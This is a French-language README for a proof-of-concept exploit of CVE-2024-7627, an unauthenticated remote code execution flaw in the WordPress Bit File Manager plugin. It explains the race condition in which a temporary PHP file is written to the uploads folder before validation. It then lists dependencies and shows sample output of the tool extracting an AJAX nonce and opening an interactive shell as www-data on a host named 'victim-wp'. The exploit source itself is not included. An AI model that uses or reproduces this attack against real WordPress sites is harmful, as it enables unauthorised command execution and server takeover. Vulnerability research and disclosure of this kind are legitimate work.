
Exploit de preuve de concept pour CVE-2024-7627, une vulnérabilité d'exécution de code à distance non authentifiée dans le plugin WordPress Bit File Manager. Automatise l'extraction de nonce, l'exploitation de la condition de course et fournit un shell inverse interactif.
Ce dépôt contient un exploit proof-of-concept (PoC) pour CVE-2024-7627, une vulnérabilité critique d'exécution de code à distance (RCE) non authentifiée dans le plugin WordPress Bit File Manager (versions 6.0 – 6.5.5).
Lorsque la fonctionnalité Guest User Read est activée, le plugin expose une condition de course dans la fonction checkSyntax.
Cette fonction écrit un fichier PHP temporaire dans /wp-content/uploads/ avant la validation, ce qui permet aux attaquants de demander le fichier et d'exécuter des commandes système arbitraires.
requests, aiohttp, asyncio, beautifulsoup4Installer les dépendances :
pip install requests aiohttp beautifulsoup4
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: 65a1d91c63
[*] Getting a random file hash...
[+] Starting interactive shell. Type 'exit' to quit.
lab-shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
lab-shell> uname -a
Linux victim-wp 5.15.0-78-generic #85-Ubuntu SMP x86_64 GNU/Linux
lab-shell> whoami
www-data